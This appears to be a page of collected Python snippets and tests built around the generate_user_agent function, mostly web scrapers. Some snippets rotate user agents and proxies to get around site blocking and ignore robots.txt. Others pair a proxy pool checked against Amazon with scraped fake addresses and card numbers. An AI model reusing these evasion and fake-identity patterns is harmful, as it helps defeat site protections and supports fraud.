Beispiel #1
0
    def test_navigator_option(self):
        for x in range(100):
            ua = generate_user_agent(navigator='firefox')
            self.assertTrue('firefox' in ua.lower())

            ua = generate_user_agent(navigator='chrome')
            self.assertTrue('chrome' in ua.lower())
Beispiel #2
0
 def test_platform_option_tuple(self):
     for x in range(100):
         ua = generate_user_agent(platform=('win', 'linux'))
         ua = generate_user_agent(platform=('win', 'linux', 'mac'))
         ua = generate_user_agent(platform=('win',))
         ua = generate_user_agent(platform=('linux',))
         ua = generate_user_agent(platform=('mac',))
Beispiel #3
0
def test_device_type_smartphone_chrome():
    for _ in range(50):
        agent = generate_user_agent(device_type='smartphone',
                                    navigator='chrome')
        assert 'Mobile' in agent
        agent = generate_user_agent(device_type='tablet', navigator='chrome')
        assert 'Mobile' not in agent
Beispiel #4
0
def test_platform_option_tuple():
    for _ in range(50):
        generate_user_agent(os=('win', 'linux'))
        generate_user_agent(os=('win', 'linux', 'mac'))
        generate_user_agent(os=('win',))
        generate_user_agent(os=('linux',))
        generate_user_agent(os=('mac',))
Beispiel #5
0
    def test_platform_navigator_option(self):
        for x in range(100):
            ua = generate_user_agent(platform='win', navigator='firefox')
            self.assertTrue('firefox' in ua.lower())
            self.assertTrue('windows' in ua.lower())

            ua = generate_user_agent(platform='win', navigator='chrome')
            self.assertTrue('chrome' in ua.lower())
            self.assertTrue('windows' in ua.lower())
Beispiel #6
0
def test_platform_option():
    for _ in range(50):
        agent = generate_user_agent(os='linux')
        assert 'linux' in agent.lower()

        agent = generate_user_agent(os='win')
        assert 'windows' in agent.lower()

        agent = generate_user_agent(os='mac')
        assert 'mac' in agent.lower()
Beispiel #7
0
def test_navigator_option():
    for _ in range(50):
        agent = generate_user_agent(navigator='firefox')
        assert 'firefox' in agent.lower()

        agent = generate_user_agent(navigator='chrome')
        assert 'chrome' in agent.lower()

        agent = generate_user_agent(navigator='ie')
        assert 'msie' in agent.lower() or 'rv:11' in agent.lower()
Beispiel #8
0
    def test_platform_option(self):
        for x in range(100):
            ua = generate_user_agent(platform='linux')
            self.assertTrue('linux' in ua.lower())

            ua = generate_user_agent(platform='win')
            self.assertTrue('windows' in ua.lower())

            ua = generate_user_agent(platform='mac')
            self.assertTrue('mac' in ua.lower())

            self.assertRaises(UserAgentRuntimeError,
                              generate_user_agent,
                              platform=11)
def getarticle(readfile):
    ''' get the article and save it in a different file '''
    try:
        fileopen = open(readfile)
    except IOError:
        print "file " + readfile + " not in the location specified"
        return

    i = 1
    for line in fileopen:
        try:
        	ua = generate_user_agent()
        	head = ua.encode('ascii', 'ignore')
        	headers = {'useragent':head}

        	print "reading article :"
        	print line
        	html = requests.get(line, headers = headers).text
        	tex = fulltext(html)
        	writefile = "201604"+str(j)+"_"+str(i)+".txt"
        	with io.open(writefile, encoding='utf-8', mode='w+') as ns:
        		strng = ' '.join(tex.split())
        		ns.write(strng)
        		ns.close()
        	i = i + 1       	
       	except:
       	    pass
Beispiel #10
0
def get_proxies(proxy_type, ip_set, start_page, end_page):
    """extract proxies from page source code, store them in redis
    
    Args:
        proxy_type (str): base url for proxy type, like the global variables CHINA and OTHER
        ip_set (str): which set should the ips be stored in redis
        start_page (int):  which page to start crawling
        end_page (int): which page to stop crawling
    """
    try:
        conn = get_connection()
    except Exception:
        print 'Error while connecting to redis'
        return
    proxies, curr_proxy =[], None
    for page in xrange(start_page, end_page+1):
        if page % 2 == 0:
            time.sleep(20)
        # get page source code
        headers = {'user-agent': generate_user_agent(), 'referer': 'http://www.xicidaili.com/'}
        text = requests.get(proxy_type+str(page), headers = headers).text
        # extract ips from source code
        soup = BeautifulSoup(text, 'lxml')
        for tr in soup.find_all('tr')[1:]:
            tds = tr.find_all('td')
            #if u'美国' in tds[3].text:
            proxy = tds[1].text+':'+tds[2].text               
            if is_valid('https://www.amazon.com/', proxy):
                conn.sadd(ip_set, proxy)
                print '%s added to ip set %s' %(proxy, ip_set)
Beispiel #11
0
def getBaiduDictCate():
    """
    功能:得到百度词库的分类,有三级分类,因为三级分类太细而且较少,所以将三级分类纳入其二级分类
    :return:两个词典,第一个词典记录大类的ID和内容的对应关系,第二个词典记录了第一个词典中每一类大类下的所有分类
    """
    bigCateDict = {}
    smallCateDict ={}
    initPageURL = r'https://shurufa.baidu.com/dict'
    cateBaseURL = r'https://shurufa.baidu.com/dict_list?cid='

    # 防止502错误
    userAgent = generate_user_agent()
    referrer = 'http://shurufa.baidu.com/dict.html'  
    headers = {}
    headers['User-Agent'] = userAgent
    headers['Referer'] = referrer

    # 抓取大类
    try:
        request = urllib2.Request(url=initPageURL, headers=headers)
        response = urllib2.urlopen(request)
        data = response.read()
    except urllib2.HTTPError, e:
        print 'Error while getting the big category,error code:',e.code
        sys.exit()
Beispiel #12
0
def get_address(proxy):
    """fetch american address from https://fakena.me/random-real-address/
    
    Args:
        proxy (str): proxy to visit the target site, ip:port
    
    Returns:
        format_addr (str): american address in the form of "address_line # city # state # zip"
    """
    ignore_warnings()
    url = r'https://fakena.me/random-real-address/'
    referer = r'https://fakena.me'
    header = {'user-agent' : generate_user_agent() , 'referer':referer }
    curr_proxy ={
    'http': 'http://%s'%proxy
    }

    text = requests.get(url, headers = header, proxies = curr_proxy).text
    pattern = re.compile('<strong>(.+)<br>(.+)</strong>')
    result = re.findall(pattern, text)
    if result: # sometimes the result is empty
        print result[0][0], result[0][1]
        address_line = result[0][0]
        city, state_zip = result[0][1].split(',')
        state, zip = state_zip.split()
        format_addr = address_line+'#'+city+'#'+state+'#'+zip
        return format_addr
    else:
        return ''
def getheadline(companyName, day, firstlink, prevdatelink):
    '''
    scrap headlines from finance.yahoo.com
    '''
    #date = '2016-02-'+str(day)
    searchUrl = 'http://finance.yahoo.com/q/h?s='+companyName+'&t=2016-04-'+str(day)
    #use fake useragent
    #ua = generate_user_agent()
    
    head = generate_user_agent().encode('ascii', 'ignore')
    headers = {'useragent':head}
    response = requests.get(searchUrl, headers=headers)
    
    soup = BeautifulSoup(response.content, 'html.parser')
    links = soup.select('div.yfi_quote_headline ul > li > a')
    #write the search results in file, a new file for each day
    filename = 'links'+str(day)+'.txt'

    with io.open(filename, encoding='utf-8', mode='w+') as ns:
        count = 1
        for link in links:
            nextlinks = link.get('href')+'\n'
            if count == 1:
                ns.write(nextlinks)
                firstlink = nextlinks
            elif prevdatelink == nextlinks:
                print "All uniques headlines scraped"
                break
            else:
                ns.write(nextlinks)
            count += 1
        ns.close()
    return firstlink
def getCategoryPages(caterotyID,downloadDIR):
    """通过类别的初始页面得到该类别的总页数,并将所有的页数放到 PAGE_QUEUE 中供所有线程下载

    :param caterotyID: 下载的词库类型的 ID,用于找到正确 url
    :param downloadDIR: 下载词库的存放目录
    :return:
    """
    global CATEID, DOWNLOAD_DIR, PAGE_BASE_URL, THREAD_LOCK
    CATEID = caterotyID
    DOWNLOAD_DIR = downloadDIR
    PAGE_BASE_URL = 'https://shurufa.baidu.com/dict_list?cid=%s' % CATEID
    pagePattern = re.compile(r'page=(\d+)#page')    # 在网页源码找到其他页面的URL的正则表达匹配模式
    
    # 防止502错误
    userAgent = generate_user_agent()
    referrer = 'http://shurufa.baidu.com/dict.html'  
    headers = {}
    headers['User-Agent'] = userAgent
    headers['Referer'] = referrer

    # 找到最大页的页码,然后所有页面就是1到最大页面
    # 可能会返回502,500错误,最多尝试5次
    maxTry = 8
    data = None
    for i in xrange(maxTry):
        try:
            request = urllib2.Request(url=PAGE_BASE_URL, headers=headers)
            response = urllib2.urlopen(request)
            data = response.read()
            break
        except urllib2.HTTPError, e:
            if i == maxTry-1:
                with io.open(DOWNLOAD_LOG.decode('utf8'), mode = 'a', encoding = 'utf8') as f:
                    f.write((str(e.code)+' error while parsing url '+PAGE_BASE_URL+'\n').decode('utf8'))
        except:
Beispiel #15
0
    def on_blocked(self):
        ScholarConf.USER_AGENT = generate_user_agent() # Randomize user agent
        self.timeout *= 2.0 # Increase timeout (exponential backoff)

        if self.blocked_cmd is not None:
            status, output = getstatusoutput(self.blocked_cmd)
            if status != 0:
                self.status.error(output)
Beispiel #16
0
    def send_query(self, query):
        # TODO: Randomize query, i.e. remove/change unused arguments to vary query signature
        self.queries_sent += 1
        if self.queries_sent % self.queries_change == 0:
            self.queries_change = randint(3, 13)
            ScholarConf.USER_AGENT = generate_user_agent()

        return super(BibDLQuerier, self).send_query(query)
Beispiel #17
0
  def invoke(self, url):
    headers = {'User-Agent': generate_user_agent()}
    req = requests.get(url, headers= headers)

    soup = BeautifulSoup(req.text, 'lxml') #from_encoding="gb2312")
    books = soup.select("div.book_list > ul > li")

    for book in books:
      self.parse_book(book)
Beispiel #18
0
def get_request(url):
    """
    Takes in a url
    Outputs a list of html for each user's posts
    """

    headers = {"User-Agent": generate_user_agent()}
    response = requests.get(url, headers)
    return response
def download_images(link_file_path, download_dir, log_dir):
    """download images whose links are in the link file
    
    Args:
        link_file_path (str): path of file containing links of images
        download_dir (str): directory to store the downloaded images
    
    Returns:
        None
    """
    print('Start downloading with link file {0}..........'.format(link_file_path))
    if not os.path.exists(log_dir):
        os.makedirs(log_dir)
    main_keyword = link_file_path.split('/')[-1]
    log_file = log_dir + 'download_selenium_{0}.log'.format(main_keyword)
    logging.basicConfig(level=logging.DEBUG, filename=log_file, filemode="a+", format="%(asctime)-15s %(levelname)-8s  %(message)s")
    img_dir = download_dir + main_keyword + '/'
    count = 0
    headers = {}
    if not os.path.exists(img_dir):
        os.makedirs(img_dir)
    # start to download images
    with open(link_file_path, 'r') as rf:
        for link in rf:
            try:
                o = urlparse(link)
                ref = o.scheme + '://' + o.hostname
                #ref = 'https://www.google.com'
                ua = generate_user_agent()
                headers['User-Agent'] = ua
                headers['referer'] = ref
                print('\n{0}\n{1}\n{2}'.format(link.strip(), ref, ua))
                req = urllib.request.Request(link.strip(), headers = headers)
                response = urllib.request.urlopen(req)
                data = response.read()
                file_path = img_dir + '{0}.jpg'.format(count)
                with open(file_path,'wb') as wf:
                    wf.write(data)
                print('Process-{0} download image {1}/{2}.jpg'.format(main_keyword, main_keyword, count))
                count += 1
                if count % 10 == 0:
                    print('Process-{0} is sleeping'.format(main_keyword))
                    time.sleep(5)

            except urllib.error.URLError as e:
                print('URLError')
                logging.error('URLError while downloading image {0}reason:{1}'.format(link, e.reason))
                continue
            except urllib.error.HTTPError as e:
                print('HTTPError')
                logging.error('HTTPError while downloading image {0}http code {1}, reason:{2}'.format(link, e.code, e.reason))
                continue
            except Exception as e:
                print('Unexpected Error')
                logging.error('Unexpeted error while downloading image {0}error type:{1}, args:{2}'.format(link, type(e), e.args))
                continue
def download_with_time_limit(link_file_path, download_dir, log_dir, limit_time = 10):
    main_keyword = link_file_path.split('/')[-1]
    if not os.path.exists(log_dir):
        os.makedirs(log_dir)
    log_file = log_dir + 'download_selenium_{0}.log'.format(main_keyword)
    logging.basicConfig(level = logging.DEBUG, filename = log_file, filemode = "a+", format = "%(asctime)-15s %(levelname)-8s  %(message)s")
    img_dir = download_dir + main_keyword + '/'
    count = 0
    headers = {}
    if not os.path.exists(img_dir):
        os.makedirs(img_dir)
    signal.signal(signal.SIGALRM, handler)
    with open(link_file_path, 'r') as rf:
        for link in rf:
            try:
                ref = 'https://www.google.com'
                o = urlparse(link)
                ref = o.scheme + '://' + o.hostname
                ua = generate_user_agent()
                headers['User-Agent'] = ua
                headers['referer'] = ref

                # limit the time of downloading a image
                try:
                    signal.alarm(limit_time) # set a timeout(alarm)
                    req = urllib.request.Request(link.strip(), headers = headers)
                    response = urllib.request.urlopen(req)
                    data = response.read()
                except TimeLimitError as e:
                    print('TimeLimitError: process-{0} encounters {1}'.format(main_keyword, e.value))
                    logging.error('TimeLimitError while downloading image{0}'.format(link))
                    continue
                finally:
                    signal.alarm(0) # disable the alarm

                file_path = img_dir + '{0}.jpg'.format(count)
                with open(file_path,'wb') as wf:
                    wf.write(data)
                print('Process-{0} download image {1}/{2}.jpg'.format(main_keyword, main_keyword, count))
                count += 1
                if count % 10 == 0:
                    print('Process-{0} is sleeping'.format(main_keyword))
                    time.sleep(5)
            except urllib.error.HTTPError as e:
                print('HTTPError')
                logging.error('HTTPError while downloading image {0}http code {1}, reason:{2}'.format(link, e.code, e.reason))
                continue
            except urllib.error.URLError as e:
                print('URLError')
                logging.error('URLError while downloading image {0}reason:{1}'.format(link, e.reason))
                continue
            except Exception as e:
                print('Unexpected Error')
                logging.error('Unexpeted error while downloading image {0}error type:{1}, args:{2}'.format(link, type(e), e.args))
                continue
def download_images(main_keyword, supplemented_keywords, download_dir):
    """download images with one main keyword and multiple supplemented keywords
    
    Args:
        main_keyword (str): main keyword
        supplemented_keywords (list[str]): list of supplemented keywords
    
    Returns:
        None
    """  
    image_links = set()
    print('Process {0} Main keyword: {1}'.format(os.getpid(), main_keyword))

    # create a directory for a main keyword
    img_dir =  download_dir + main_keyword + '/'
    if not os.path.exists(img_dir):
        os.makedirs(img_dir)

    for j in range(len(supplemented_keywords)):
        print('Process {0} supplemented keyword: {1}'.format(os.getpid(), supplemented_keywords[j]))
        search_query = (main_keyword + ' ' + supplemented_keywords[j]).replace(' ','%20')
        # url = 'https://www.google.com/search?q=' + search_query + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg'
        url = 'https://www.google.com/search?q=' + search_query + '&source=lnms&tbm=isch'
        image_links = image_links.union(parse_page(url))
        print('Process {0} get {1} links so far'.format(os.getpid(), len(image_links)))
        time.sleep(2)
    print ("Process {0} get totally {1} links".format(os.getpid(), len(image_links)))

    print ("Start downloading...")
    count = 1
    for link in image_links:
        try:
            req = urllib.request.Request(link, headers = {"User-Agent": generate_user_agent()})
            response = urllib.request.urlopen(req)
            data = response.read()
            file_path = img_dir + '{0}.jpg'.format(count)
            with open(file_path,'wb') as wf:
                wf.write(data)
            print('Process {0} fininsh image {1}/{2}.jpg'.format(os.getpid(), main_keyword, count))
            count += 1
        except urllib.error.URLError as e:
            logging.error('URLError while downloading image {0}\nreason:{1}'.format(link, e.reason))
            continue
        except urllib.error.HTTPError as e:
            logging.error('HTTPError while downloading image {0}\nhttp code {1}, reason:{2}'.format(link, e.code, e.reason))
            continue
        except Exception as e:
            logging.error('Unexpeted error while downloading image {0}\nerror type:{1}, args:{2}'.format(link, type(e), e.args))
            continue

    print("Finish downloading, total {0} errors".format(len(image_links) - count))
Beispiel #22
0
def generate_profile(useragent="(default)"):
    profile = FirefoxProfile()
    if useragent.strip().lower()=="(default)":
        status("Using the default useragent")
        return profile
    elif useragent.strip().lower()=="(random)":
        random_useragent = generate_user_agent(os=('mac', 'linux'))
        profile.set_preference("general.useragent.override", random_useragent) # To make our useragent random
        status("Using random useragent "+random_useragent)
        return profile
    else:
        profile.set_preference("general.useragent.override", useragent)
        status("Using useragent "+useragent)
        return profile
Beispiel #23
0
def test_invalid_platform_option():
    with pytest.raises(InvalidOption):
        generate_user_agent(os=11)

    with pytest.raises(InvalidOption):
        generate_user_agent(os='dos')

    with pytest.raises(InvalidOption):
        generate_user_agent(os='win,dos')
Beispiel #24
0
def get_phone_visa():
    """fetch phone, visa from http://www.fakeaddressgenerator.com/World/us_address_generator"""
    url = r'http://www.fakeaddressgenerator.com/World/us_address_generator'
    referer = r'http://www.fakeaddressgenerator.com/World'
    header = {'user-agent' : generate_user_agent() , 'referer':referer }
    text = requests.get(url, headers = header).text
    soup = BeautifulSoup(text, 'lxml')
    info = soup.find_all('input')
    """
    print 'name:',info[0]['value']
    print 'phone:',info[9]['value']
    print 'visa:',info[11]['value']
    print 'expires:',info[13]['value']
    """
    name_phone =  info[0]['value']+'#'+info[9]['value']
    name_visa = info[0]['value']+'#'+info[11]['value']+'#'+info[13]['value']
    print name_phone, name_visa
    return name_phone, name_visa
Beispiel #25
0
    def __init__(self, proxy):
        """init the webdriver by setting the proxy and user-agent
        
        Args:
            proxy (str): proxy in the form of ip:port
        """
        # set proxy
        ip, port = proxy.split(':')
        profile = webdriver.FirefoxProfile()
        profile.set_preference("network.proxy.type", 1)
        profile.set_preference("network.proxy.http", ip)
        profile.set_preference("network.proxy.http_port", port)
        # set user_agent
        profile.set_preference("general.useragent.override", generate_user_agent())

        profile.update_preferences()
        self.driver = webdriver.Firefox(firefox_profile=profile)
        
        print 'current proxy: %s'%proxy
def download_page(url):
    """download raw content of the page
    
    Args:
        url (str): url of the page 
    
    Returns:
        raw content of the page
    """
    try:
        headers = {}
        headers['User-Agent'] = generate_user_agent()
        headers['Referer'] = 'https://www.google.com'
        req = urllib.request.Request(url, headers = headers)
        resp = urllib.request.urlopen(req)
        return str(resp.read())
    except Exception as e:
        print('error while downloading page {0}'.format(url))
        logging.error('error while downloading page {0}'.format(url))
        return None
Beispiel #27
0
def is_valid(target_url, ip, referer):
    """judge if a proxy ip is valid for target_url
    
    Args:
        target_url (str): url that need to visite with a proxy
        ip (str): the set in redis to get 
        referer (str, optional): referer part of  headers  of the request
    
    Returns:
        boolean
    """
    ignore_warnings()
    proxy = {
    'http': 'http://%s' %ip
    }
    headers = {'user-agent': generate_user_agent(), 'referer': referer}
    try:
        r = requests.get(target_url, headers = headers, proxies = proxy, timeout = 6)
        return True
    except Exception:
        return False
def downloadSingleCate(cateID, dirName, downloadLog, tryBest = True):
    """下载某一类别的词库

    :param cateID: 类别ID
    :param dirName: 下载的目录
    :parm downloadLog: 下载日志,记录下载不成功的文件
    :parm downloadLog: 是否达到最大尝试次数
    :return: None
    """
    pageBaseUrl = r'https://shurufa.baidu.com/dict_list?cid=%s' %cateID
    fileBaseUrl = r'https://shurufa.baidu.com/dict_innerid_download?innerid='

    pagePattern = re.compile(r'page=(\d+)#page')  # 非贪婪匹配,查找跳转到其他页面的url
    filePattern = re.compile(r'dict-name="(.*?)" dict-innerid="(\d+)"')   # 非贪婪匹配,查找可下载的文件的id和

    visited = set()       # 记录某个url是否已经被访问了
    downloaded = set()    # 记录某个文件是否被下载了


    # 防止502错误
    userAgent = generate_user_agent()
    referrer = 'http://shurufa.baidu.com/dict.html'  
    headers = {}
    headers['User-Agent'] = userAgent
    headers['Referer'] = referrer

    # 找到最大页的页码,然后所有页面就是1到最大页面
    try:
        request = urllib2.Request(url=pageBaseUrl, headers=headers)
        response = urllib2.urlopen(request)
        data = response.read()
    except urllib2.HTTPError, e:
        if tryBest:
            with io.open(downloadLog.decode('utf8'), mode = 'a', encoding = 'utf8') as f:
                f.write((str(e.code)+' error while parsing url '+pageBaseUrl+'\n').decode('utf8'))
        return False
def main():
    page = 0

    while True:
        page += 1

        payload = {
            'ss': 1,
            'page': page,
        }

        user_agent = generate_user_agent()
        headers = {
            'User-Agent': user_agent,
        }

        print(f'PAGE: {page}')
        response = requests.get(HOST + ROOT_PATH,
                                params=payload,
                                headers=headers)
        response.raise_for_status()
        random_sleep()

        html = response.text

        soup = BeautifulSoup(html, 'html.parser')

        class_ = 'card card-hover card-visited wordwrap job-link'
        cards = soup.find_all('div', class_=class_)
        if not cards:
            cards = soup.find_all('div', class_=class_ + ' js-hot-block')

        result = []
        if not cards:
            break

        for card in cards:
            tag_a = card.find('h2').find('a')
            title = tag_a.text
            href = tag_a['href']
            result.append([title, href])
            vac_response = requests.get(HOST + href, headers=headers)
            vac_html = vac_response.text
            vac_soup = BeautifulSoup(vac_html, 'html.parser')

            workua_id = int(href.split('/')[-2])

            vacancy = vac_soup.find('h1', id='h1-name').text

            address = vac_soup.find(
                'p', class_='text-indent add-top-sm').text.strip()
            address = address.split('\n')[0]

            blocks = vac_soup.find_all(
                'p', class_='text-indent text-muted add-top-sm')
            for block in blocks:
                if block.find('a') != None:
                    company = block.find('a').find('b').text
                else:
                    if block.find('b') != None:
                        salary = block.find('b').text
                        salary = salary.replace('\u202f', '')
                        salary = salary.replace('\u2009', '')
                if not 'salary' in locals():
                    salary = None

            data = (workua_id, vacancy, company, address, salary)
            cur.execute('''INSERT INTO jobs VALUES (?, ?, ?, ?, ?)''', data)

            db.commit()

        save_info(result)

    db.close()
Beispiel #30
0
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
#     https://doc.scrapy.org/en/latest/topics/settings.html
#     https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#     https://doc.scrapy.org/en/latest/topics/spider-middleware.html
from user_agent import generate_user_agent

BOT_NAME = 'HeZhiNews'

SPIDER_MODULES = ['HeZhiNews.spiders']
NEWSPIDER_MODULE = 'HeZhiNews.spiders'

# Crawl responsibly by identifying yourself (and your website) on the user-agent
USER_AGENT = generate_user_agent(os='win')

# Obey robots.txt rules
ROBOTSTXT_OBEY = False

# Configure maximum concurrent requests performed by Scrapy (default: 16)
CONCURRENT_REQUESTS = 8

# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
CONCURRENT_REQUESTS_PER_DOMAIN = 8
CONCURRENT_REQUESTS_PER_IP = 8
Beispiel #31
0
 def test_it(self):
     ua = generate_user_agent()
     self.assertTrue(len(ua) > 0)
Beispiel #32
0
 def test_platform_linux(self):
     for x in range(100):
         ua = generate_user_agent(platform='linux')
         self.assertTrue(ua.startswith('Mozilla/5.0 (X11;'))
Beispiel #33
0
import re
from bs4 import BeautifulSoup
from user_agent import generate_user_agent

# Web scraping details
lastFmUrl = "https://www.last.fm"
topArtistsUrl = "/user/kaktusas86/library/artists?date_preset=ALL_TIME&page=1"
headers = {
    'User-Agent': generate_user_agent(device_type="desktop",
                                      os=('mac', 'linux'))
}


def fetchUrl(url, headers):
    response = requests.get(url, timeout=60, headers=headers)
    return BeautifulSoup(response.content, 'html.parser')


def fetchTopArtistsWithSoup():
    topArtistsSoup = fetchUrl(url=(lastFmUrl + topArtistsUrl), headers=headers)
    topArtistsHtml = topArtistsSoup.find(id="top-artists-section")
    # Loop through table rows reading basiuc info about artist
    for artistInfo in topArtistsHtml.find_all('tr'):
        try:
            #Parse basic info: rank, title and scrobble count
            rank = artistInfo.find('td', class_="chartlist-index")
            rank = " ".join(rank.string.split())
            name = artistInfo.find('td', class_="chartlist-name")
            href = name.find('a', class_="link-block-target").get('href')
            name = " ".join(name.text.split())
            scrobbles = artistInfo.find('td', class_="chartlist-countbar")
Beispiel #34
0
 def __init__(self, base_url):
     super().__init__(base_url)
     self.headers = {
         "User-Agent":
         generate_user_agent(device_type="desktop", os=("mac", "linux"))
     }
Beispiel #35
0
@file: jianshu.py
@time: 01/03/2018 20:44
"""

import requests
from bs4 import BeautifulSoup
from core import config, logger, db
from entities import Article
import user_agent

headers = {
    'Connection': 'keep-alive',
    'Cache-Control': 'max-age=0',
    'Accept': 'text/html, */*; q=0.01',
    'X-Requested-With': 'XMLHttpRequest',
    'User-Agent': user_agent.generate_user_agent(),
    'Accept-Encoding': 'gzip, deflate, sdch',
    'Accept-Language': 'zh-CN,zh;q=0.8,ja;q=0.6'
}


class Config(object):
    def __init__(self, cfg: dict):
        self.seminars = cfg['seminars']
        self.limit = cfg['limit']
        self.debug = cfg['debug'] if 'debug' in cfg else True


class Jianshu:
    _seminar_url = 'https://www.jianshu.com/c/%s?order_by=added_at&page=%d'
    _jianshu = 'https://www.jianshu.com'
Beispiel #36
0
def page_scraper(links):
    print('Cruises Pages scrap process...')
    result = []
    for url in links:
        try:
            user_agent_ = {
                'User-Agent':
                generate_user_agent(device_type='desktop', os=('mac', 'linux'))
            }
            print('scrap url page ...' + url[-30:-1] + 'l')
            dict_result = {}
            ask = requests.get(url, headers=user_agent_)
            soup = BSoup(ask.content, 'html.parser')

            #Получение имени
            name = soup.find('div',
                             class_='col-md-9 river-site-highlight').find(
                                 'h1').get_text().split('\n')[0]
            dict_result.update({'name': name})

            #Получение количества дней
            soup_iter = soup.find(
                'div', class_='panel-group accordion route').find_all(
                    'div', class_='panel panel-default')
            count_days = len(soup_iter)

            #Получение маршрутов
            itineary = [
                soup_item.find('span', class_="route-city").text.replace(
                    ' ', '').replace('\n', '') for soup_item in soup_iter
            ]
            dict_result.update({'itineary': itineary})

            #Получение списка с датой отправки, кораблем, ценой
            soup_dayprice_iter = soup.find(
                'div',
                class_='panel-group accordion price accordeon-data-price'
            ).find_all('div',
                       class_='panel panel-default accordeon-panel-default')
            temp_list = []
            for soup_item in soup_dayprice_iter:
                tag_a = soup_item.find('a', class_='collapsed panel-title')
                date_ = tag_a.find('div', class_='price-date').find(
                    'span', class_='price-duration').get_text()
                ship_ = tag_a.find(
                    'div', class_='price-ship').find('span').get_text()
                price_ = tag_a.find('div', class_='price-ship').find(
                    'div', class_='pull-right').find(
                        'span',
                        class_='big-table-font').text.replace(' ', '').replace(
                            '\n', '').replace('€', '').replace('.', '')
                temp_list.append(
                    {date_converter(date_): {
                         'ship': ship_,
                         'price': price_
                     }})
            dict_result.update({'days': temp_list})
            result.append(dict_result)
        except:
            print('Page ' + url[-30:-1] + 'l' + 'Not load')
    write_in_file(result)
Beispiel #37
0
def main(platform, navigator, **kwargs):
    for x in range(30):
        print(generate_user_agent(platform=platform, navigator=navigator))
Beispiel #38
0
 def __init__(self):
     headers = {}
     headers['User-Agent'] = generate_user_agent()
     self.session = Session()
     self.session.headers = headers
Beispiel #39
0
class StatsZbHgjdSpider(scrapy.Spider):
    name = 'StatsZbHgjdSpider'
    allowed_domains = ['data.stats.gov.cn']
    start_urls = ['http://data.stats.gov.cn/easyquery.htm?cn=C01']

    DOWNLOAD_DELAY =20

    get_tree_url = 'http://data.stats.gov.cn/easyquery.htm'

    root_zb = ['A01', 'A02', 'A03', 'A04', 'A05', 'A06']
    # root_zb = ['A01']

    root_param ={"dbcode":"hgjd","wdcode":"zb","m":"getTree"}

    user_agent = generate_user_agent()
    headers = {
    'Accept': 'text/plain, */*; q=0.01',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Connection': 'keep-alive',
    # 'Content-Length': '38',
    'Content-Type': 'application/x-www-form-urlencoded',
    # 'Cookie': 'JSESSIONID=F57026E9795D5E42B04115AB1FC3F258; u=1; wzws_cid=7043b0f11490d1af13890c46dab3c77ff11815b0d6ed6e0bb208fba85822ed47ea9b8783a325b98ef76e90cfe4933255c2f6c6ab8c95edff8fd3105126e023a7',
    'Host': 'data.stats.gov.cn',
    'Origin': 'http://data.stats.gov.cn',
    'Referer': 'http://data.stats.gov.cn/easyquery.htm',
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36',
    'X-Requested-With': 'XMLHttpRequest'}
    headers["User-Agent"]=user_agent

    def parse(self, response):
        for id in self.root_zb:
            self.root_param["id"] = id
            yield scrapy.FormRequest(url=(self.get_tree_url+"?"+urllib.parse.urlencode(self.root_param)),method='POST',headers=self.headers,callback=self.parse_content,dont_filter=True)
            # yield scrapy.FormRequest(url=self.get_tree_url, method='POST',
            #                          headers=self.headers,callback=self.parse_content,dont_filter=True)

    def parse_content(self, response):
        try:
            time.sleep(1)
            if 200 != response.status:
                print("res status not 200!")
            # print(str(response.body,"utf-8"))
            son_zb_arr = json.loads(str(response.body,"utf-8"))
            for key in son_zb_arr:
                # item = StatsZbSpiderItem()
                # item['dbcode'] = key['dbcode']
                # item['id'] = key['id']
                # item['isParent'] = key['isParent']
                # item['name'] = key['name']
                # item['pid'] = key['pid']
                # item['wdcode'] = key['wdcode']
                # print(key)
                if key['isParent']:
                    self.root_param["id"] = key["id"]
                    yield scrapy.FormRequest(url=(self.get_tree_url + "?" + urllib.parse.urlencode(self.root_param)),
                                             method='POST', headers=self.headers, callback=self.parse_content,
                                             dont_filter=True)
                yield key
        except BaseException:
            print('')
Beispiel #40
0
    def process_config(self, grab):
        """
        Setup curl instance with values from ``self.config``.
        """

        # Copy some config for future usage
        self.config_nobody = grab.config["nobody"]
        self.config_body_maxsize = grab.config["body_maxsize"]

        try:
            request_url = normalize_url(grab.config["url"])
        except Exception as ex:
            raise error.GrabInvalidUrl(u"%s: %s" % (six.text_type(ex), grab.config["url"]))

        # py3 hack
        if not six.PY3:
            request_url = make_str(request_url)

        self.curl.setopt(pycurl.URL, request_url)

        # Actually, FOLLOWLOCATION should always be 0
        # because redirect logic takes place in Grab.request method
        # BUT in Grab.Spider this method is not invoked
        # So, in Grab.Spider we still rely on Grab internal ability
        # to follow 30X Locations
        self.curl.setopt(pycurl.FOLLOWLOCATION, 1 if grab.config["follow_location"] else 0)
        self.curl.setopt(pycurl.MAXREDIRS, grab.config["redirect_limit"])
        self.curl.setopt(pycurl.CONNECTTIMEOUT, grab.config["connect_timeout"])
        self.curl.setopt(pycurl.TIMEOUT, grab.config["timeout"])
        self.curl.setopt(pycurl.IPRESOLVE, pycurl.IPRESOLVE_V4)
        # self.curl.setopt(pycurl.DNS_CACHE_TIMEOUT, 0)
        if not grab.config["connection_reuse"]:
            self.curl.setopt(pycurl.FRESH_CONNECT, 1)
            self.curl.setopt(pycurl.FORBID_REUSE, 1)

        self.curl.setopt(pycurl.NOSIGNAL, 1)
        self.curl.setopt(pycurl.HEADERFUNCTION, self.header_processor)

        if grab.config["body_inmemory"]:
            self.curl.setopt(pycurl.WRITEFUNCTION, self.body_processor)
        else:
            if not grab.config["body_storage_dir"]:
                raise error.GrabMisuseError("Option body_storage_dir is not defined")
            self.setup_body_file(
                grab.config["body_storage_dir"],
                grab.config["body_storage_filename"],
                create_dir=grab.config["body_storage_create_dir"],
            )
            self.curl.setopt(pycurl.WRITEFUNCTION, self.body_processor)

        if grab.config["verbose_logging"]:
            self.verbose_logging = True

        # User-Agent
        if grab.config["user_agent"] is None:
            if grab.config["user_agent_file"] is not None:
